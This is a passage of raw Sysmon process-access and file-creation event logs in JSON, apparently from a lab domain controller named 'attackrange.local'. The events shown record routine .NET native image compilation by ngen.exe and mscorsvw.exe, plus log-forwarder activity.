(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:51.545\r\nProcessGuid: {E2A3D6B1-1398-5F25-0000-0010256A1000}\r\nProcessId: 4836\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e4-0\\System.Windows.Forms.DataVisualization.dll\r\nCreationUtcTime: 2020-08-01 07:02:51.545","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:51.545","ProcessGuid":"{E2A3D6B1-1398-5F25-0000-0010256A1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e4-0\\System.Windows.Forms.DataVisualization.dll","CreationUtcTime":"2020-08-01 07:02:51.545","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.638\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-0010176F1000}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.638","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-0010176F1000}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-0010176F1000}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-0010176F1000}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-0010176F1000}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-0010176F1000}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.685\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1390-5F25-0000-001066061000}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.685","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1390-5F25-0000-001066061000}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.685\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1390-5F25-0000-001066061000}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.685","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1390-5F25-0000-001066061000}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-0010DF721000}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-0010DF721000}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:51.857\r\nProcessGuid: {E2A3D6B1-139B-5F25-0000-0010DF721000}\r\nProcessId: 2544\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9f0-0\\System.Windows.Forms.DataVisualization.Design.dll\r\nCreationUtcTime: 2020-08-01 07:02:51.857","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:51.857","ProcessGuid":"{E2A3D6B1-139B-5F25-0000-0010DF721000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9f0-0\\System.Windows.Forms.DataVisualization.Design.dll","CreationUtcTime":"2020-08-01 07:02:51.857","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.888\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1391-5F25-0000-0010020B1000}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 